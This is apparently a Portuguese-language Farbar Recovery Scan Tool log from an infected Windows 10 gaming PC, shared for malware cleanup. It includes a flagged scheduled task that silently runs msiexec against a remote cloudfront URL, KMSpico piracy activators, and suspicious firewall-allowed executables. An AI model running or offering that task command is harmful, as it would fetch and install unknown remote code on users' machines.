Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 20-05-2017
Executado por Note (22-05-2017 08:49:11)
Executando a partir de C:\Users\Note\Downloads
Windows 10 Pro Versão 1703 (X64) (2017-04-17 12:26:28)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-1810685751-3673504307-3616125758-500 - Administrator - Enabled) => C:\Users\Administrador
Convidado (S-1-5-21-1810685751-3673504307-3616125758-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1810685751-3673504307-3616125758-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-1810685751-3673504307-3616125758-1000 - Limited - Disabled) => C:\Users\defaultuser0
Note (S-1-5-21-1810685751-3673504307-3616125758-1001 - Administrator - Enabled) => C:\Users\Note
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\uTorrent) (Version: 3.5.0.43580 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Ansel (Version: 381.65 - NVIDIA Corporation) Hidden
Atualizações da NVIDIA 25.0.0.0 (Version: 25.0.0.0 - NVIDIA Corporation) Hidden
Blizzard App (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version: - Valve)
Dell System Detect (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\d24084d039586cae) (Version: 8.4.0.5 - Dell)
Discord (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Glary Utilities 5.71 (HKLM-x32\...\Glary Utilities 5) (Version: 5.71.0.92 - Glarysoft Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\R3JhbmRUaGVmdEF1dG9W_is1) (Version: 1 - )
H1Z1: King of the Kill (HKLM\...\Steam App 433850) (Version: - Daybreak Game Company)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4590 - Intel Corporation)
Malwarebytes versão 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Maxx Audio Installer (x64) (Version: 2.6.8627.1 - Waves Audio Ltd.) Hidden
Microsoft Office Professional Plus 2016 - pt-br (HKLM\...\ProPlusRetail - pt-br) (Version: 16.0.7967.2161 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mozilla Firefox 52.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 52.0.1 (x86 pt-BR)) (Version: 52.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.1 - Mozilla)
NVIDIA Driver de gráficos 381.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 381.65 - NVIDIA Corporation)
NVIDIA Driver do 3D Vision 381.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 381.65 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.17.0329 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0329 - NVIDIA Corporation)
NvNodejs (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7967.2161 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7967.2161 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7967.2161 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
Painel de controle da NVIDIA 381.65 (Version: 381.65 - NVIDIA Corporation) Hidden
PLAYERUNKNOWN'S BATTLEGROUNDS (HKLM\...\Steam App 578080) (Version: - Bluehole, Inc.)
Popcorn-Time (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\Popcorn-Time) (Version: 0.3.10 - Popcorn Time)
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.6 - PowerISO Computing, Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21289 - Realtek Semiconduct Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7908 - Realtek Semiconductor Corp.)
RESIDENT EVIL 7 biohazard version Update 3 (HKLM-x32\...\RESIDENT EVIL 7 biohazard_is1) (Version: Update 3 - GMT-MAX.ORG)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
SHIELD Streaming (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
Spotify (HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\Spotify) (Version: 1.0.54.1079.g3809528e - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {00A82C33-E245-47DE-9BB5-DB1E5DD2B85F} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-05-03] (NVIDIA Corporation)
Task: {110D4B01-04F3-4DB7-9BF7-BE9244DDA060} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-05-03] (NVIDIA Corporation)
Task: {1560FB29-201E-43D3-BD18-226CE2261401} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-05-03] (NVIDIA Corporation)
Task: {305C6219-3132-49F2-8DD2-8A6DAC50D50D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-05-13] (Microsoft Corporation)
Task: {343ECDB8-FDF1-4209-BCAF-B5FE58043297} - \Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic -> Nenhum Arquivo <==== ATENÇÃO
Task: {443C1DD6-8600-4E22-A5C7-65C954FBA1A9} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-04] (Microsoft Corporation)
Task: {4F704AB1-40EE-4F31-9A03-05866D021DE3} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-05-03] (NVIDIA Corporation)
Task: {6C8B1B0C-8C31-4027-93C7-C75F9BAC52B2} - System32\Tasks\Microsoft\Windows\DeviceSettings\Vijervernuy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ02ABD100H_17BLT1WCTXX17BLT1WCT&d=20170519 /q <==== ATENÇÃO
Task: {7ADEA196-8115-4393-A40D-122A8AD0381F} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic
Task: {7F1FCA61-08A3-4A8F-B715-3A3C78E54EF0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-24] (Google Inc.)
Task: {943989CC-3E61-4D2D-8224-DFD19C9054E5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-05-03] (NVIDIA Corporation)
Task: {9C6F9DD3-5A71-4F4F-8ECA-41F1C1EFA728} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-05-03] (NVIDIA Corporation)
Task: {9F4F6F89-7984-4653-8994-EEC142685CDE} - System32\Tasks\GlaryInitialize 5 => C:\Program Files (x86)\Glary Utilities 5\Initialize.exe [2017-03-12] (Glarysoft Ltd)
Task: {A1049936-4008-4AF6-88FE-CC9EE16B2FED} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-05-03] (NVIDIA Corporation)
Task: {A68B37C4-4E31-40ED-B720-913CE066789D} - \Cat Defender -> Nenhum Arquivo <==== ATENÇÃO
Task: {AD04FFA9-3434-4DDE-8186-E58289FCA127} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-24] (Google Inc.)
Task: {AFE36DE3-3BD0-40BE-A132-A5E5E3C7ACCF} - System32\Tasks\GU5SkipUAC => C:\Program Files (x86)\Glary Utilities 5\Integrator.exe [2017-04-23] (Glarysoft Ltd)
Task: {B5B5BB5E-D286-4BFB-994C-11406214829C} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-09-07] (Realtek Semiconductor)
Task: {B8F62A2E-374B-4A6C-A6B4-A97E7ECFD8EC} - System32\Tasks\Driver Booster SkipUAC (Note) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
Task: {BC66A3C5-90D8-4423-B350-BA7727988086} - \Microsoft\Windows\Multimedia\Manager -> Nenhum Arquivo <==== ATENÇÃO
Task: {CC55B2D5-8A40-41E5-AF37-97B78829AFB8} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-04] (Microsoft Corporation)
Task: {E37872A4-0995-4206-99CF-055CED9F5B82} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {F63D9408-36B9-4D8B-B80D-6A85FA627444} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-05-13] (Microsoft Corporation)
Task: {FE103227-1AF9-4E1E-8D17-FED2BE24F4A9} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-05-03] (NVIDIA Corporation)
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\GlaryInitialize 5.job => C:\Program Files (x86)\Glary Utilities 5\Initialize.exe
Task: C:\WINDOWS\Tasks\GU5SkipUAC.job => C:\Program Files (x86)\Glary Utilities 5\Integrator.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
ShortcutWithArgument: C:\Users\Note\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->
==================== Módulos Carregados (Whitelisted) ==============
2017-03-24 16:37 - 2017-05-03 17:21 - 01267320 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-18 17:58 - 2017-03-18 17:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 17:59 - 2017-03-20 00:59 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-05-12 08:34 - 2017-05-09 06:13 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libglesv2.dll
2017-05-12 08:34 - 2017-05-09 06:13 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libegl.dll
2017-03-24 16:37 - 2017-05-03 17:21 - 01040504 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-24 15:31 - 2017-03-09 21:13 - 00674592 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2017-03-24 15:31 - 2016-08-31 22:02 - 04969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2017-03-24 15:31 - 2017-04-25 20:55 - 02465056 _____ () C:\Program Files (x86)\Steam\video.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-24 15:30 - 2016-01-27 04:49 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-24 15:30 - 2016-08-31 22:02 - 01563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2017-03-24 15:31 - 2016-08-31 22:02 - 01195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2017-03-24 15:31 - 2017-04-25 20:55 - 00848672 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-24 15:30 - 2016-07-04 19:17 - 00266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2017-03-24 15:33 - 2017-01-30 18:41 - 68875552 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-03-24 15:31 - 2017-04-25 20:55 - 00383776 _____ () C:\Program Files (x86)\Steam\steam.dll
2017-04-23 22:45 - 2017-04-23 22:45 - 00089088 _____ () C:\Program Files (x86)\Glary Utilities 5\zlib1.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\51730011.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\51730011.sys => ""="Driver"
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ==========================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2016-07-16 08:47 - 2017-05-19 09:37 - 00001207 _____ C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 v1.ff.avast.com
127.0.0.1 vlcproxy.ff.avast.com
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 dscdn.pw
127.0.0.1 beautifllink.xyz
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Note\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.25.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "GUDelayStartup"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_10799480DB499B38AC0891F1739CB28D"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "Discord"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [{7B23D4C5-4994-41A2-9CFE-C981C26E31E5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{4A1AE54F-3353-4000-9B40-6E0E1818A17C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{564A310C-6596-4F37-BEAC-993441E69895}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{E69F83D3-6CED-48B4-B3C9-C8A3A88EF08D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{124D154A-1170-48A7-B483-8CBA2780F3D0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [UDP Query User{4CD86F4E-631A-4F98-A702-CDB4A7267BF2}C:\users\note\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\note\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E0477992-A221-49D1-96D3-206E3D1860EC}C:\users\note\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\note\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5DCF4FCD-46E4-45B2-8942-7BCD60A59F58}C:\users\note\appdata\local\popcorn-time\popcorn-time.exe] => (Allow) C:\users\note\appdata\local\popcorn-time\popcorn-time.exe
FirewallRules: [TCP Query User{965F6266-EC3E-48E3-9E93-1D81427EE404}C:\users\note\appdata\local\popcorn-time\popcorn-time.exe] => (Allow) C:\users\note\appdata\local\popcorn-time\popcorn-time.exe
FirewallRules: [UDP Query User{2C181B2E-E016-4638-8B67-D958FFFF44BA}C:\program files (x86)\steam\steamapps\common\lms\lms.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lms\lms.exe
FirewallRules: [TCP Query User{0AB08635-6128-4708-9699-0ADB49B27785}C:\program files (x86)\steam\steamapps\common\lms\lms.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lms\lms.exe
FirewallRules: [{EE156857-AD31-489F-8CAA-D5A44FF67578}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{AD21115A-F004-4B37-97E4-94B9D2D3DF5C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{A259EB4F-1928-48FB-85BF-684B72912942}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F6B390A4-4480-4338-A720-521E0E8598FD}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{3455062D-F720-4472-9F8A-50EF7B03FACC}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E504E2C6-F1F7-4F75-A91D-4326F424C6D3}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D5993570-4E50-4F9D-A5B9-576198335F8B}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B7638D25-936D-46AF-AFA4-A46E258495E4}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [UDP Query User{188A30BB-C918-4DA5-B9AB-FAC94BB981AE}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [TCP Query User{02094F61-C6DB-491A-9E53-872B2B1749F1}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [{E42EFB6C-C33A-43D9-93F1-62A450377498}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{91F5C06E-511C-420C-B2A5-EAF481ABB913}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [UDP Query User{A1A7FA87-BD00-41F9-BD15-B0311FF45829}C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Block) C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [TCP Query User{751AAF85-EEAE-4739-962C-ADD10C805EEA}C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Block) C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [{A2BF6C76-77C2-46EF-8CDF-F3E70F39C75F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{CC677011-9B9C-43AF-A775-3C4E049B42FE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D38F2697-9DD1-489E-B9E2-D831C37DD82E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{9A2D81A6-4A06-4334-80AF-77A2F0F8EC14}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{2799B2D9-5F3A-4059-8514-CEBFA3E4ADD2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{46023E59-3228-46D3-B974-4D4487520DCC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{34045F41-034B-4C7A-807B-B65EFE89F90B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{117548CA-3C9D-445A-9A81-EC485600471C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BD096F52-D6B9-4EC9-A0CD-12E98DEEA492}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E2A7F171-D8DD-4F70-87A1-D0B2EC2B0C9D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{724D7AA3-125F-4D24-9471-12CF6E4F22DA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51654A73-F7FC-4752-BD52-2028803E32CB}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{C5671932-9BAE-43D2-86C1-BDD0E9AB2AE5}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [TCP Query User{D3CC885A-4104-4573-B70F-398581B5E9E2}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{10301D1E-3A3D-4F54-895D-740E6287160F}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [TCP Query User{6E80CB29-DD0F-4AFE-8702-778BF104AA38}C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{C15695B8-E15C-4EDB-A226-7152D69B34AB}C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A9A1B94-3042-4A38-AA0D-DE03E14C393F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{A5E1CC36-144C-4F32-B688-D8D6C0FBFBE3}C:\program files (x86)\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{78AC0542-72BD-4E21-BDFA-1B11E86E6AE0}C:\program files (x86)\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\grand theft auto v\gta5.exe
FirewallRules: [{522772FF-1853-42E9-9BCC-00670C5038F0}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{AF565BAE-0682-4AEC-A404-15F647268419}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{11A3380A-9E86-4176-B7F3-22141D67951B}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{2D607491-09AA-4DAD-AAB7-CA780E6B3C03}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{7CFE7110-14AF-4208-A1E0-31C92E4905C1}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe
FirewallRules: [{3DA6A251-5EB0-4F3B-9696-E10004C979C5}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{C88C6CD1-B128-4CDC-8D0D-83E8C8352AB3}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{0077B118-77A5-4419-832E-D50F74E7A7DC}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{36112208-F519-4796-B447-67C51D963D60}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{21651611-9CC7-4FB8-A9F8-59A08DF58525}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Pontos de Restauração =========================
19-05-2017 19:42:53 Ponto de Verificação Agendado
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (05/22/2017 08:24:41 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
